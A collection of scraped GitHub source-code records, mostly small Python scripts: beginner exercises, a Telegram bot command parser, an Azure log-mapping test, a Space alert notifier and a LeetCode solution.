(yes | no) \"\nwhile active_polling:\n\tuser_name = input(prompt1.title())\n\tdream_vacation = input(prompt2.title())\n\t\n\tuser_vacations[user_name] = dream_vacation\n\t\n\trepeat = input(prompt3.title())\n\tif repeat == 'no':\n\t\tactive_polling = False\n\nprint(\"\\n----- RESULTS OF THE POLL ------\\n\")\nfor name, vacation in user_vacations.items():\n\tprint(name.title() + \" has a dream of visiting \" + vacation.title() + \".\")\n","repo_name":"huzaifabaloch/Python_Crash_Book_Exercises","sub_path":"Chap_7 - User Input And While Loop/7_10_dream_vacation.py","file_name":"7_10_dream_vacation.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"38502336034","text":"\"\"\"\n Main script for application.\n\"\"\"\n\n__author__ = ['Bhavik Patel']\n__version__ = \"1.0.0\"\n\nfrom my_app import app\n\n\ndef main():\n # init main object\n print(\"Initializing script..\")\n obj = app.App()\n\n print(\"Running app..\")\n obj.run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"bhvikp/pyspark-skeleton","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22928962916","text":"from some_model import SomeModel\n\n\ndef predict_message_mood(\n message: str,\n model: SomeModel,\n bad_thresholds: float = 0.3,\n good_thresholds: float = 0.8,\n) -> str:\n score: float = model.predict(message)\n\n if good_thresholds > 1.0 or good_thresholds < 0.0:\n raise ValueError('good_thresholds must be in range [0.0 , 1.0]')\n\n if bad_thresholds > 1.0 or bad_thresholds < 0.0:\n raise ValueError('bad_thresholds must be in range [0.0 , 1.0]')\n\n if good_thresholds < bad_thresholds:\n raise ValueError('good_thresholds must be greater than bad_thresholds')\n\n if score < bad_thresholds:\n return 'неуд'\n elif score > good_thresholds:\n return 'отл'\n else:\n return 'норм'\n","repo_name":"genusB/made_advance_python","sub_path":"advance_07/predict_message_mood.py","file_name":"predict_message_mood.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2474574143","text":"\"\"\"\nFiona Wong\n\nMaddelin Maddelin\n\"\"\"\nfrom game_creation import ascii_art\n\n\ndef character_has_leveled(character: dict, level_chart: dict) -> bool:\n \"\"\"\n Return True if character has leveled up based on a dictionary of set level EXP, else False.\n\n :param character: a dictionary that contains the following keys (each with possibly modified values):\n 'Name', 'Partner Name', 'X-coordinate', 'Y-coordinate', 'LEVEL', 'HP', and 'EXP'\n :param level_chart: a dictionary that contains the attainable levels and the EXP value required for each level\n :precondition: character must be a non-empty dictionary containing the necessary key-value pairs\n :return: True if character has leveled up based on a dictionary of set level EXP, else False\n\n >>> test_character = {'Name': 'Hunter', 'Partner Name': 'Killua', 'X-coordinate': 0, 'Y-coordinate': 0, 'LEVEL': 1,\n ... 'HP': 100, 'EXP': 0}\n >>> test_level_chart = {1: 1, 2: 5, 3: 25, 4: 125, 5: 625}\n >>> character_has_leveled(test_character, test_level_chart)\n False\n >>> test_character = {'Name': 'Raon', 'Partner Name': 'Gon', 'X-coordinate': 0, 'Y-coordinate': 0, 'LEVEL': 1,\n ... 
'HP': 100, 'EXP': 125}\n >>> test_level_chart = {1: 1, 2: 5, 3: 25, 4: 125, 5: 625}\n >>> character_has_leveled(test_character, test_level_chart)\n True\n \"\"\"\n result = False\n next_exp = level_chart[character['LEVEL'] + 1]\n if character['LEVEL'] and character['EXP'] >= next_exp:\n result = True\n return result\n\n\ndef display_level_chart() -> dict:\n \"\"\"\n Create and print a dictionary that contains the attainable levels and the EXP value required for each level.\n\n :postcondition: creates and prints a dictionary that contains the attainable levels and the EXP value required for\n each level.\n :return: a dictionary that contains the attainable levels and the EXP value required for each level\n\n >>> level_chart = display_level_chart()\n >>> level_chart\n {1: 100, 2: 200, 3: 300, 4: 400, 5: 500, 6: 600, 7: 700, 8: 800, 9: 900, 10: 1000}\n \"\"\"\n return {level: exp for level, exp in enumerate(range(100, 1100, 100), start=1)}\n\n\ndef execute_glow_up_protocol(character: dict) -> None:\n \"\"\"\n Display the corresponding ASCII art and increment the character level by 1 and HP by 100.\n\n :param character: a dictionary that contains the following keys (each with possibly modified values):\n 'Name', 'Partner Name', 'X-coordinate', 'Y-coordinate', 'LEVEL', 'HP', and 'EXP'\n :precondition: character must be a non-empty dictionary containing the necessary key-value pairs\n :postcondition: displays the corresponding ASCII art and increments the character level by 1 and HP by 100\n\n >>> test_character = {'Name': 'Jess', 'Partner Name': 'Bess', 'X-coordinate': 0, 'Y-coordinate': 0, 'LEVEL': 1,\n ... 'HP': 100, 'EXP': 25}\n >>> execute_glow_up_protocol(test_character)\n ========================================================================\n +.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.\n ||| ||||| || || |||||| ||| || || |||||||\n ||| || || || || ||| || || || ||\n ||| ||||| || || ||||| ||| || || |||||||\n ||| || | | || ||| || || ||\n |||||| ||||| ||| |||||| ||||||| |||||| ||\n +.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.\n ========================================================================\n <BLANKLINE>\n Current Status:\n LEVEL: 2\n HP: 300\n EXP: 25\n <BLANKLINE>\n\n >>> test_character = {'Name': 'Hiu', 'Partner Name': 'Paus', 'X-coordinate': 0, 'Y-coordinate': 0, 'LEVEL': 3,\n ... 
'HP': 1, 'EXP': 125}\n >>> execute_glow_up_protocol(test_character)\n ========================================================================\n +.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.\n ||| ||||| || || |||||| ||| || || |||||||\n ||| || || || || ||| || || || ||\n ||| ||||| || || ||||| ||| || || |||||||\n ||| || | | || ||| || || ||\n |||||| ||||| ||| |||||| ||||||| |||||| ||\n +.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.\n ========================================================================\n <BLANKLINE>\n Current Status:\n LEVEL: 4\n HP: 201\n EXP: 125\n <BLANKLINE>\n \"\"\"\n ascii_art.level_up_message()\n character['LEVEL'] += 1\n character['HP'] += 200\n print(f\"\\tCurrent Status:\\n\"\n f\"\\tLEVEL: {character['LEVEL']}\\n\"\n f\"\\tHP: {character['HP']}\\n\"\n f\"\\tEXP: {character['EXP']}\\n\")\n","repo_name":"Maddelin/revival-A4-1510","sub_path":"character_information/leveling.py","file_name":"leveling.py","file_ext":"py","file_size_in_byte":4926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72762500808","text":"\"\"\"\nPlot the entropy of user usages by county.\n\n\"\"\"\n\nimport sys\nimport twitterproj\nimport json\nimport matplotlib\nimport matplotlib.pyplot as plt\n\ndef collect_data():\n count = sys.argv[1]\n style = sys.argv[2]\n normalized = bool(int(sys.argv[3]))\n\n ents = twitterproj.userentropy__counties(count, style, normalized=normalized)\n fn = \"userentropies_{0}_{1}_{2}.json\"\n if normalized:\n fn = fn.format(count, style, 'norm')\n else:\n fn = fn.format(count, style, 'nonorm')\n\n with open(fn, 'w') as f:\n json.dump(ents, f)\n\ndef plot():\n numTweets_count = json.load(open('userentropies_numTweets_count_norm.json'))\n numTweetsWithHashtags_count = json.load(open('userentropies_numTweetsWithHashtags_count_norm.json'))\n\n numTweets_count_nonorm = json.load(open('userentropies_numTweets_count_nonorm.json'))\n numTweetsWithHashtags_count_nonorm = json.load(open('userentropies_numTweetsWithHashtags_count_nonorm.json'))\n\n population = json.load(open('json/grids.counties.bot_filtered.respop72013.json'))\n\n counties = list(numTweets_count.keys())\n\n w = [numTweets_count[geoid] for geoid in counties]\n x = [numTweetsWithHashtags_count[geoid] for geoid in counties]\n y = [numTweets_count_nonorm[geoid] for geoid in counties]\n z = [numTweetsWithHashtags_count_nonorm[geoid] for geoid in counties]\n c = [population[geoid] for geoid in counties]\n\n #matplotlib.style.use('fivethirtyeight')\n import seaborn\n\n f, (ax1, ax2) = plt.subplots(1,2)\n ax1.scatter(w, x, c=c, s=5, alpha=.5, edgecolors='none',\n norm=matplotlib.colors.LogNorm(), cmap=matplotlib.cm.GnBu)\n cax = ax2.scatter(y, z, c=c, s=5, alpha=.5, edgecolors='none',\n norm=matplotlib.colors.LogNorm(), cmap=matplotlib.cm.GnBu)\n\n ax1.set_xlabel('Normalized User Entropy of Tweets')\n ax1.set_ylabel('Normalized User Entropy of Hashtagged Tweets')\n ax1.set_xlim(0.0001, 0.15)\n ax1.set_ylim(0.0001, 0.15)\n ax1.set_xscale('log')\n ax1.set_yscale('log')\n ax2.set_xlabel('User Entropy of Tweets')\n ax2.set_ylabel('User Entropy of Hashtagged Tweets')\n\n cb = f.colorbar(cax)\n cb.set_label(\"Log Population\")\n\n 
f.savefig('UserEntropyByCounty.pdf')\n\nplot()\n#collect_data()\n","repo_name":"chebee7i/twitter","sub_path":"scripts/userentropies.py","file_name":"userentropies.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"10893286819","text":"from random import *\r\n\r\ndef main():\r\n \r\n choice = input(\"Just 'p'orts, 'i'p, 't'ransmisisson, 's'tandards, or study 'e'verything?\")\r\n\r\n if choice.lower() == \"p\":\r\n flashcards = open(\"ports.txt\", \"r\")\r\n elif choice.lower() == \"i\":\r\n flashcards = open(\"ip.txt\")\r\n elif choice.lower() == \"t\":\r\n flashcards = open(\"transmission.txt\")\r\n elif choice.lower() == \"s\":\r\n flashcards = open(\"standards.txt\")\r\n else:\r\n flashcards = open(\"flashcards.txt\", \"r\")\r\n\r\n flashDict = {}\r\n flashKeys = []\r\n wrongKeys = []\r\n done = False\r\n count = 0\r\n\r\n for card in flashcards:\r\n question, answer = card.split(\",\")\r\n answer = answer.strip(\"\\n\")\r\n flashDict[question] = answer.lower()\r\n\r\n for key in flashDict.keys():\r\n flashKeys.append(key)\r\n\r\n for i in range(len(flashKeys) - 1):\r\n num = randrange(0, (len(flashKeys) - 1))\r\n flashKeys[i], flashKeys[num] = flashKeys[num], flashKeys[i]\r\n\r\n for question in flashKeys:\r\n questionStr = question + \": \"\r\n answer = input(questionStr)\r\n\r\n if answer.lower() in flashDict[question]:\r\n print(\"CORRECT!\\n\")\r\n count = count + 1\r\n else:\r\n print(\"Incorrect! Answer: \", flashDict[question], \"\\n\")\r\n wrongKeys.append(question)\r\n \r\n print(\"You got: \", count, \"correct out of \", len(flashDict))\r\n print(\"Work on: \")\r\n\r\n for key in wrongKeys:\r\n print(key)\r\n \r\nmain()\r\n","repo_name":"duncan-mcfarland/flashcards","sub_path":"NetworkPlus.py","file_name":"NetworkPlus.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16015299861","text":"from logs_ingest.mapping import extract_resource_id_attributes, RESOURCE_ID_ATTRIBUTE, SUBSCRIPTION_ATTRIBUTE, \\\n RESOURCE_GROUP_ATTRIBUTE, RESOURCE_TYPE_ATTRIBUTE, RESOURCE_NAME_ATTRIBUTE\n\n\ndef test_extract_resource_id_simple_resource_id():\n run_successful_extraction_test(\n resource_id=\"subscriptions/a84d2d12-76ea-449c-8c1e-9fb2dee5f6b1/resourceGroups/rg-adagze/providers/Microsoft.Maps/accounts/maps-hackaton-test\",\n expected_subscription=\"a84d2d12-76ea-449c-8c1e-9fb2dee5f6b1\",\n expected_resource_group=\"rg-adagze\",\n expected_resource_type=\"Microsoft.Maps/accounts\",\n expected_resource_name=\"maps-hackaton-test\"\n )\n\n\ndef test_extract_resource_id_attributes_nested_resource_type():\n run_successful_extraction_test(\n resource_id=\"/subscriptions/a84d2d12-76ea-449c-8c1e-9fb2dee5f6b1/resourceGroups/rg-jelpet/providers/Microsoft.NetApp/netAppAccounts/naf-jelpet-just-trying/capacityPools/cappool-jelpet-just-trying\",\n expected_subscription=\"a84d2d12-76ea-449c-8c1e-9fb2dee5f6b1\",\n expected_resource_group=\"rg-jelpet\",\n expected_resource_type=\"Microsoft.NetApp/netAppAccounts/capacityPools\",\n expected_resource_name=\"cappool-jelpet-just-trying\"\n )\n\n\ndef test_extract_resource_id_attributes_invalid_resource_id():\n result_dict = {}\n resource_id = \"a84d2d12-76ea-449c-8c1e-9fb2dee5f6b1/resourceGroups/rg-jelpet/providers/Microsoft.NetApp/netAppAccounts/naf-jelpet-just-trying/capacityPools/cappool-jelpet-just-trying\"\n extract_resource_id_attributes(result_dict, 
resource_id)\n    assert result_dict == {RESOURCE_ID_ATTRIBUTE: resource_id}\n\n\ndef run_successful_extraction_test(\n        resource_id: str,\n        expected_subscription: str,\n        expected_resource_group: str,\n        expected_resource_type: str,\n        expected_resource_name: str\n):\n    result_dict = {}\n    extract_resource_id_attributes(result_dict, resource_id)\n    assert result_dict[SUBSCRIPTION_ATTRIBUTE].casefold() == expected_subscription.casefold()\n    assert result_dict[RESOURCE_GROUP_ATTRIBUTE].casefold() == expected_resource_group.casefold()\n    assert result_dict[RESOURCE_TYPE_ATTRIBUTE].casefold() == expected_resource_type.casefold()\n    assert result_dict[RESOURCE_NAME_ATTRIBUTE].casefold() == expected_resource_name.casefold()\n","repo_name":"dynatrace-oss/dynatrace-azure-log-forwarder","sub_path":"tests/test_mapping.py","file_name":"test_mapping.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"16"}
{"seq_id":"70027054410","text":"import cv2\nimport os\nfrom PIL import Image\nfrom PIL import ImageFile\nImageFile.LOAD_TRUNCATED_IMAGES = True\n# location of dataset \n#video_path = '/c3d/C3D-Action-Recognition/datasets/ucf-101/'\nvideo_path = './datasets/ucf-101/'\nlabelnum=-1\nlabellist=[]\naction_list = os.listdir(video_path)\n# split dataset into train, test and classification parts\nf1 = 
open('./ucfTrainTestlist/train_file.txt', 'w')\nf2 = open('./ucfTrainTestlist/test_file.txt', 'w')\nf3 = open('./ucfTrainTestlist/classInd.txt', 'w')\n#f1 = open('/c3d/C3D-Action-Recognition/ucfTrainTestlist/train_file.txt', 'w')\n#f2 = open('/c3d/C3D-Action-Recognition/ucfTrainTestlist/test_file.txt', 'w')\n#f3 = open('/c3d/C3D-Action-Recognition/ucfTrainTestlist/classInd.txt', 'w')\nfor action in action_list:\n video_list = os.listdir(video_path+action)\n prefixlist=[]\n labelnum+=1\n for video in video_list:\n prefix = video.split('.avi')[0] # if see first '.' then split the string\n if video.find('v_',0) == 0:\n prefix = prefix.replace('v_','')\n prefixlist.append(prefix)\n #label = prefix.split('_')[0]\n #print(label) \n \"\"\"\n if label not in labellist:\n labellist.append(label)\n labelnum+=1\n #print(prefix)\n f1.write(prefix+' '+str(labelnum)+'\\n')\n \"\"\"\n prefixlen=len(prefixlist)\n \n train = 0.8\n for i in range(int(prefixlen*0.8)):\n f1.write(prefixlist[i]+' '+str(labelnum)+'\\n')\n for i in range(int(prefixlen*0.8),prefixlen):\n f2.write(prefixlist[i]+' '+str(labelnum)+'\\n')\ni=1\nfor action in action_list:\n f3.write(str(i)+' '+action+'\\n')\n i+=1\n\"\"\"\n if not os.path.exists(save_path+action+'/'+prefix):\n os.mkdir(save_path+action+'/'+prefix)\n save_name = save_path + action + '/' + prefix + '/'\n #save_name = save_path + prefix + '/'\n video_name = video_path+action+'/'+video\n #print(video_name)\n name = video_name.split('.')[1]\n #print(name)\n\"\"\"\n","repo_name":"CHI-YU-SUNG/C3D-Action-Recognition","sub_path":"video2list.py","file_name":"video2list.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"16351775631","text":"from util import *\nimport commands\nimport admin\n\n\ndef perm_check(cmd, userid):\n return connect().execute('''\n SELECT EXISTS(SELECT 1 FROM perm WHERE\n ((rule = :w AND (cmd = 'ALL' OR cmd = :cmd) AND userid = :userid)) AND\n duration > (julianday('now')-2440587.5)*86400.0\n ) OR NOT EXISTS(SELECT 1 FROM perm WHERE\n ((rule = :b AND (cmd = 'ALL' OR cmd = :cmd) AND userid = :userid) OR\n (rule = :w AND (cmd = 'ALL' OR cmd = :cmd) AND userid != :userid)) AND\n duration > (julianday('now')-2440587.5)*86400.0\n )\n ''', {'cmd': cmd, 'userid': userid, 'w': PERM_W, 'b': PERM_B}).fetchone()[0]\n\n\ndef parse(bot, txt, buf, msg, is_ext=False):\n # silently ignore rate-limited users\n if msg.from_user.id != admin.userid and bot.ratelimit.get(msg.from_user.id, 0) >= commands.rate_threshold: return\n\n idx = 0\n part = ''\n parts = []\n parse = True\n total_rate = 0\n\n while idx <= len(txt):\n if not parse:\n part += ('' if txt[idx] in '\\\\|' else '\\\\') + txt[idx]\n parse = True\n elif idx == len(txt) or (is_ext and txt[idx] == '|'):\n part = connect().execute('''\n SELECT dest || substr(:s, length(src)+1) FROM alias\n WHERE :s = src OR :s LIKE src || ' %'\n UNION ALL SELECT :s\n ''', {'s': part.strip()}).fetchone()[0]\n cmd, args = part.split(None, 1) if ' ' in part or '\\n' in part else (part, None)\n if not hasattr(commands, 'cmd_'+cmd):\n return f'The command {cmd} does not exist.'\n if not perm_check(cmd, msg.from_user.id):\n return f'You do not have permission to execute the {cmd} command.'\n total_rate += commands.rate_penalty[int(commands.info[cmd]['weight'])]\n parts.append((getattr(commands, 'cmd_'+cmd), args))\n part = ''\n elif is_ext and txt[idx] == '\\\\': parse = False\n else: part += txt[idx]\n idx += 1\n\n total_rate += 
bot.ratelimit.get(msg.from_user.id, 0)\n if msg.from_user.id != admin.userid and total_rate > commands.rate_threshold:\n bot.ratelimit[msg.from_user.id] = commands.rate_threshold + 60\n return ('[rate limit exceeded, please wait at least 1min before sending additional commands]', {})\n bot.ratelimit[msg.from_user.id] = total_rate\n\n res = ''\n rflags = {}\n for (func, args) in parts:\n buf, flags = forcetuple(func(bot, msg, buf if args is None else args, buf))\n if 'stderr' in flags: res += flags['stderr'] + '\\n'\n if 'parse_mode' in flags: rflags['parse_mode'] = flags['parse_mode']\n return (res + buf, rflags)\n","repo_name":"tckmn/kipfa","sub_path":"src/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34138270933","text":"#\n# @lc app=leetcode id=739 lang=python3\n#\n# [739] Daily Temperatures\n#\n# https://leetcode.com/problems/daily-temperatures/description/\n#\n# algorithms\n# Medium (60.04%)\n# Total Accepted: 76.7K\n# Total Submissions: 127.4K\n# Testcase Example: '[73,74,75,71,69,72,76,73]'\n#\n# \n# Given a list of daily temperatures T, return a list such that, for each day\n# in the input, tells you how many days you would have to wait until a warmer\n# temperature. If there is no future day for which this is possible, put 0\n# instead.\n# \n# For example, given the list of temperatures T = [73, 74, 75, 71, 69, 72, 76,\n# 73], your output should be [1, 1, 4, 2, 1, 1, 0, 0].\n# \n# \n# Note:\n# The length of temperatures will be in the range [1, 30000].\n# Each temperature will be an integer in the range [30, 100].\n# \n#\n\n# naive approach\n# def dailyTemperatures(self, T):\n# n = len(T)\n# res = [0]*n\n# for i in range(n):\n# for j in range(i+1, n):\n# if T[j] > T[i]:\n# res[i] = j-i\n# break\n# return res\n\nfrom collections import Counter\nfrom functools import reduce\nclass Solution:\n # def dailyTemperatures(self, T: List[int]) -> List[int]:\n\n def dailyTemperatures3(self, T):\n ans = [0] * len(T)\n stack = [] #indexes from hottest to coldest\n for i in range(len(T) - 1, -1, -1):\n while stack and T[i] >= T[stack[-1]]:\n stack.pop()\n if stack:\n print('update i=', i, 'stack=', stack)\n ans[i] = stack[-1] - i\n stack.append(i)\n print('i=', i, 'stack=', stack)\n return ans\n\n def dailyTemperatures2(self, T):\n n = len(T)\n res = [0]*n\n for i in range(n):\n for j in range(i+1, n):\n if T[j] > T[i]:\n res[i] = j-i\n break\n return res\n\n def dailyTemperatures(self, T):\n c = Counter(T)\n # print(c)\n s = sorted([[k, v] for k, v in c.items()])\n # print(s)\n for i in range(1, len(s)):\n # print(i)\n # print(s[i])\n s[i][1] += s[i-1][1]\n # print(s)\n percentile = dict(s)\n # print(percentile)\n n = len(T)\n res = [0] * n\n \n def method1(i):\n for j in range(i+1, n):\n if T[j] > T[i]:\n return j - i\n return 0\n d = {}\n for i in range(n):\n if T[i] not in d:\n d[T[i]] = [i]\n else:\n d[T[i]].append(i)\n # print(d)\n order = [x[0] for x in s]\n # print(order)\n def method2(i):\n min_ = float('inf')\n for j in range(order.index(T[i])+1, len(s)):\n # print('here')\n for idx in d[order[j]]:\n if idx > i:\n if idx < min_:\n min_ = idx\n if min_ < float('inf'):\n return min_ - i\n else:\n return 0\n cut = int(n*0.9)\n for i in range(n):\n if percentile[T[i]] < cut:\n res[i] = method1(i)\n else:\n res[i] = method2(i)\n return res\ns = Solution()\nT = [73, 74, 75, 71, 69, 72, 76, 73]\nprint(s.dailyTemperatures3(T))\n# 
print(s.dailyTemperatures(T) == s.dailyTemperatures2(T))\n# T = [34,80,80,34,34,80,80,80,80,34]\n\n# print(s.dailyTemperatures(T))\n\n\n\n\n# print(s.dailyTemperatures(T) == s.dailyTemperatures2(T))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"nickyfoto/lc","sub_path":"python/739.daily-temperatures.py","file_name":"739.daily-temperatures.py","file_ext":"py","file_size_in_byte":3551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32915493674","text":"from threading import Timer\r\nimport requests, json, logging, falcon\r\n\r\nLOGGER = logging.getLogger()\r\nLOGGER.setLevel(\"INFO\")\r\n\r\nclass SpaceNotifier:\r\n def __init__(self, webhook, debounce_time = 10, env=\"stagging\", silent = 10):\r\n self.notifications = {}\r\n self.__debounce_time = debounce_time\r\n self.__webhook = webhook\r\n self.__env = env\r\n self.__silent = {}\r\n self.__silent_threshold = silent\r\n self.__silent_general = []\r\n \r\n def __getMessage(self, etl):\r\n notif_type = {}\r\n for type in self.notifications[etl]['message']: #check how many time each type error happened\r\n if type not in notif_type:\r\n notif_type[type] = 1\r\n else:\r\n notif_type[type] += 1\r\n message = f\"Error occured on {etl} *{self.__env}*, error: \"\r\n\r\n for type in notif_type:\r\n message = f\"{message}\\n\\t- {type} : {notif_type[type] if notif_type[type] < self.__silent_threshold else f'{self.__silent_threshold-1}++'} time(s) raised.\"\r\n\r\n if(notif_type[type] >= self.__silent_threshold): # if one of error equal or more than silent threshold, then add it to silenced alert\r\n if etl not in self.__silent:\r\n self.__silent[etl] = []\r\n \r\n self.__silent[etl].append(type)\r\n message = f\"{message} \\n\\t\\t- *Occured too often, will be silenced till restart!*\"\r\n \r\n return f\"{message}\\nFor more detail, please check ELK.\"\r\n\r\n def send(self, etl, message):\r\n job = {\r\n \"message\" : [message],\r\n \"thread\" : None,\r\n }\r\n \r\n\r\n if \"with-param\" in etl:\r\n uris = etl.split(\"?\")\r\n uri = uris[0]\r\n query_param = uris[1] # keep param -> send email maybe ?\r\n\r\n etl = uri\r\n\r\n if etl in self.__silent:\r\n if message in self.__silent[etl]:\r\n # if error is silenced, then do not do anything\r\n return\r\n\r\n if etl in self.notifications and 'thread' in self.notifications[etl]:\r\n # if etl already scheduled for alerting, then cancel and debounce\r\n self.notifications[etl]['thread'].cancel()\r\n \r\n job['message'] = self.notifications[etl]['message'] + job[\"message\"] # append eror message \r\n self.notifications[etl] = {} \r\n \r\n self.notifications[etl] = job\r\n\r\n def __debounce(etl, message):\r\n try:\r\n self.notifications[etl] = {}\r\n response = requests.post(self.__webhook, data=json.dumps({\"text\":message}))\r\n if response.status_code != 200:\r\n LOGGER.error(str(e))\r\n except Exception as e:\r\n LOGGER.error(str(e))\r\n\r\n self.notifications[etl]['thread'] = Timer(self.__debounce_time, __debounce,args=[etl, self.__getMessage(etl)] )\r\n self.notifications[etl]['thread'].start()\r\n\r\n\r\n\r\n def __getTypedMessage(self, type):\r\n etl_counts = {}\r\n for etl in self.notifications[type]['etls']: #check how many time each type error happened\r\n if etl not in etl_counts:\r\n etl_counts[etl] = 1\r\n else:\r\n etl_counts[etl] += 1\r\n\r\n message = f\"Error occured while doing *{type.upper()}* on *{self.__env}* : \"\r\n\r\n for etl in etl_counts:\r\n message = f\"{message}\\n\\t- {etl} : {etl_counts[etl] if 
etl_counts[etl] < self.__silent_threshold else f'{self.__silent_threshold-1}++'} time(s) raised.\"\r\n\r\n if(etl_counts[etl] >= self.__silent_threshold): # if one of error equal or more than silent threshold, then add it to silenced alert\r\n if etl not in self.__silent_general:\r\n self.__silent_general.append(etl)\r\n \r\n self.__silent_general.append(etl)\r\n message = f\"{message} \\n\\t\\t- *Occured too often, will be silenced till restart!*\"\r\n \r\n return f\"{message}\\nFor more detail, please check ELK.\"\r\n \r\n def sendTyped(self, etl, type=\"ETL\" , debounce = None):\r\n \"\"\"\r\n This function will debounce an error space alert. \r\n The error is categorized as two categories, ETL and Non-ETL (recoveries:red)\r\n If no input until debounce is expired then it'll send message to Space\r\n \"\"\"\r\n\r\n # remove unnecessary query parameter, take only endpoint\r\n uris = etl.split(\"?\") \r\n etl = uris[0]\r\n\r\n jobs = {\r\n \"etls\" : [etl],\r\n \"thread\" : None,\r\n }\r\n\r\n\r\n if etl in self.__silent_general:\r\n return # if silenced then do nothing\r\n \r\n if type in self.notifications and 'thread' in self.notifications[type]:\r\n # if already scheduled, then debounce (cancel and restart)\r\n self.notifications[type]['thread'].cancel()\r\n\r\n jobs['etls'].extend(self.notifications[type]['etls'])\r\n self.notifications[type] = {} \r\n \r\n self.notifications[type] = jobs\r\n\r\n def __debounce(type, message):\r\n try:\r\n self.notifications[type] = {}\r\n response = requests.post(self.__webhook, data=json.dumps({\"text\":message}))\r\n if response.status_code != 200:\r\n LOGGER.error(str(e))\r\n except Exception as e:\r\n LOGGER.error(str(e))\r\n\r\n self.notifications[type]['thread'] = Timer(self.__debounce_time if debounce == None else debounce, __debounce,args=[type, self.__getTypedMessage(type)] )\r\n self.notifications[type]['thread'].start()\r\n \r\n\r\nclass test(object):\r\n def on_post(self, req, resp):\r\n resp.status = falcon.HTTP_200\r\n data = {'status': 'unavailable service'}\r\n resp.body = json.dumps(data)\r\n\r\n def on_get(self, req, resp):\r\n resp.status = falcon.HTTP_200\r\n content = str(1/0)\r\n data = {'status': 'success', 'content': content, 'enum': '1'}\r\n resp.body = json.dumps(data)","repo_name":"rasyid-abe/etl_datamart","sub_path":"notification.py","file_name":"notification.py","file_ext":"py","file_size_in_byte":6118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"40350304065","text":"\"\"\"\nYou are given a set A and n other sets.\nYour job is to find whether set A is a strict superset of each of the N sets.\nPrint True, if A is a strict superset of each of the N sets. Otherwise, print False.\nA strict superset has at least one element that does not exist in its subset.\n\nExample\nSet ([1,3,4]) is a strict superset of set ([1,3]).\nSet ([1,3,4]) is not a strict superset of set ([1,3,4]).\nSet ([1,3,4]) is not a strict superset of set ([1,3,5]).\n\nInput Format\nThe first line contains the space separated elements of set A.\nThe second line contains integer n, the number of other sets.\nThe next n lines contains the space separated elements of the other sets.\n\nOutput Format\nPrint True if set A is a strict superset of all other N sets. 
Otherwise, print False.\n\nSample Input:\n1 2 3 4 5 6 7 8 9 10 11 12 23 45 84 78\n2\n1 2 3 4 5\n100 11 12\n\nSample Output:\nFalse\n\nExplanation:\nSet A is the strict superset of the set ([1,2,3,4,5]) but not of the set ([100,11,12]) because 100 is not in set A.\nHence, the output is False.\n\"\"\"\n\"\"\"\nExplanation of the solution code:\nIn Python, the > operator is used to check if a set is a strict superset of another set. \nIf all elements of the second set are in the first set, \nand the first set has at least one element that the second set doesn't have, \nA > B returns True. Otherwise, it returns False.\n\"\"\"\nA = set(map(int, input().split()))\nnum_other_sets = int(input())\n\nis_strict_superset = True\nfor _ in range(num_other_sets):\n    other_set = set(map(int, input().split()))\n    if not (A > other_set):\n        is_strict_superset = False\n        break\n\nprint(is_strict_superset)\n","repo_name":"CihatAcar/HackerRank-Python-Exercises","sub_path":"Sets/check_strict_superset.py","file_name":"check_strict_superset.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
{"seq_id":"17872540326","text":"# Print the number of vowels in a sentence entered by the user.\nvowels = ['a', 'e', 'i', 'o', 'u'] # list of vowel letters\nword = input(\"Provide a word to search for vowels: \") # ask the user for a sentence or word\nfound = {} # dictionary\n\nfound['a'] = 0\nfound['e'] = 0\nfound['i'] = 0\nfound['o'] = 0\nfound['u'] = 0\n\nfor letter in word: # iterate over the letters of the word\n\tif letter in vowels: # if the letter is a vowel\n\t\tfound[letter] += 1 # count this letter\n\nfor k, v in sorted(found.items()): # key and value \n\tprint(k, 'was found', v, 'time(s).') # the letter and its count\n","repo_name":"Lumaks42/codePythonStart","sub_path":"vowels_improvement.py","file_name":"vowels_improvement.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
